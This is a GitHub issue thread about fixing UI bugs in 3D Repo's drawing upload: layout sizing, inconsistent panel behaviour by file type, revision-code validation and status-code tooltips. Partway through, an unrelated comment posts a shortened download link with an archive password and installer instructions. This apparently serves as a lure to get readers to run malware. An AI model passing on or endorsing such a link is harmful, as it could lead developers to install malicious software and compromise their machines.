### ISSUE TITLE
[2D MVP] Milestone 1: Upload drawing fixes

### ISSUE THREAD

**Issue by sanmont3drepo** [3drepo/3drepo.io#5126]
### Description
Product issue: https://github.com/3drepo/3D-Repo-Product-Team/issues/377.
There's some bugs when uploading drawings 

### Bugs

- [x] The sizing logic here is a bit odd (this is half of a 1080 screen):
<img src="https://github.com/user-attachments/assets/51c7c133-313d-4d8c-af7f-3c9492f1e040"  width="500" />

&nbsp;

- [x] Behaviour also seems to change  for no clear reason depending on whether I upload a pdf or dwg, the drawing side panel only pops up automatically if I upload a pdf:
<img src="https://github.com/user-attachments/assets/e292afe7-6553-43b6-a214-962cff27add6"  width="500" />

&nbsp;

- [x] Revision code can have at most 10 characters but it is not validating it. 
<img src="https://github.com/user-attachments/assets/f7b0a3fd-2537-41a3-88d9-723989e6d97c"  width="500" />

&nbsp;

- [x] Can we get a tooltip on hover or wrap to new line for status code descriptions? You can never read the description at the moment. 
<img src="https://github.com/user-attachments/assets/ec9dcbce-9569-49a6-8f40-e1d2548c6011"  width="500" />

- [ ] Also can we adjust the width distribution so status code gets more width space? (The title doesn't need to be half the modal, rev code can only have 10 characters so ti could be smaller too)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sanmont3drepo** [comment]
merged in base branch
